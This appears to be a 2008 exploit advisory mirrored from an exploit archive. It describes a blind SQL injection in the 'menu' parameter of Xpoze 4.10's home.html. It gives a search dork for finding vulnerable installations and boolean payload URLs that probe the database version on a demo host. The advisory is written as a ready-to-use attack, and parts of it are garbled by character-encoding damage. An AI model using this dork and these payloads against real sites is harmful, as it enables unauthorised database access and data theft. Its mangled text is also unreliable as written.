[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability
# Published : 2008-12-12
# Author : XaDoS
# Previous Title : SUMON <= 0.7.0 (chg.php host) Command Execution Vulnerability
# Next Title : Social Groupie (group_index.php id) Remote SQL Injection Vulnerability


[a–?]  Xpoze Pro  (home men?1) <= Blind $ql Injection

 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B?§g: Blind $ql inJection
> SIte vuln: http://www.xpoze.org/

>---------------------------------------<
 
 
[a–?] ExPL0iT:
 
Dork: " Powered by Xpoze "

|: http://www.example.com/home.html?menu=[$qL] 


[a–?] D?£M0: 
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5  [NO?°?°]
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] 
 

 
[a–?] Th4nKs::
 
> Str0ke </ >Il pavimento</ >sibilla</ >Lo z00</ >I FoxHound ( goto www.myspace.com/foxhoundindie )

# www.Syue.com [2008-12-12]